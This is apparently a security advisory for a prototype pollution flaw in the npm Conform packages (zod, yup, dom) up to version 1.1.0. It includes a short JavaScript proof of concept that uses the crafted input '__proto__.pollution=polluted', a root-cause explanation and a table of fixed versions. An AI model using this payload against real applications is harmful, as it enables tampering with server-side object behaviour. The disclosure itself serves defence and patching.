[NPM:GHSA-624G-8QJG-8QXF] Conform contains a Prototype Pollution Vulnerability in `parseWith...` function

Severity High
Affected Packages 3
Fixed Packages 3
CVEs 1

Summary

Conform allows the parsing of nested objects in the form of object.property. Due to an improper implementation of this feature, an attacker can exploit it to trigger prototype pollution by passing a crafted input to parseWith... functions.

PoC

```javascript
const { parseWithZod } = require('@conform-to/zod');
const { z } = require("zod");

const param = new URLSearchParams("__proto__.pollution=polluted");
const schema = z.object({ "a": z.string() });

parseWithZod(param, { schema });
console.log("pollution:", ({}).pollution); // should print "polluted"
```

Details

The invocation of the parseWithZod function in the above PoC triggers the setValue function through getSubmissionContext and parse, executing the following process, resulting in prototype pollution:

```javascript
let pointer = value;

pointer.__proto__ = pointer.__proto__;
pointer = pointer.__proto__;

pointer.polluted = "polluted";
```

This is caused by the lack of object existence checking on line 117 in formdata.ts, where the code only checks for the presence of pointer[key] without proper validation.

Impact

Applications that use conform for server-side validation of form data or URL parameters are affected by this vulnerability.

Package Affected Version
pkg:npm/%40conform-to/zod <= 1.1.0
pkg:npm/%40conform-to/yup <= 1.1.0
pkg:npm/%40conform-to/dom <= 1.1.0
ID
NPM:GHSA-624G-8QJG-8QXF
Severity
high
URL
https://github.com/advisories/GHSA-624g-8qjg-8qxf
Published
2024-04-23T21:15:55
(4 weeks ago)
Modified
2024-04-23T21:15:57
(4 weeks ago)
Rights
NPM Security Team
Type Package URL Namespace Name / Product Version Distribution / Platform Arch Patch / Fix
Affected pkg:npm/%40conform-to/zod @conform-to zod <= 1.1.0
Fixed pkg:npm/%40conform-to/zod @conform-to zod = 1.1.1
Affected pkg:npm/%40conform-to/yup @conform-to yup <= 1.1.0
Fixed pkg:npm/%40conform-to/yup @conform-to yup = 1.1.1
Affected pkg:npm/%40conform-to/dom @conform-to dom <= 1.1.0
Fixed pkg:npm/%40conform-to/dom @conform-to dom = 1.1.1
# CVE Description CVSS EPSS EPSS Trend (30 days) Affected Products Weaknesses Security Advisories Exploits PoC Pubblication Date Modification Date
# CVE Description CVSS EPSS EPSS Trend (30 days) Affected Products Weaknesses Security Advisories PoC Pubblication Date Modification Date
Loading...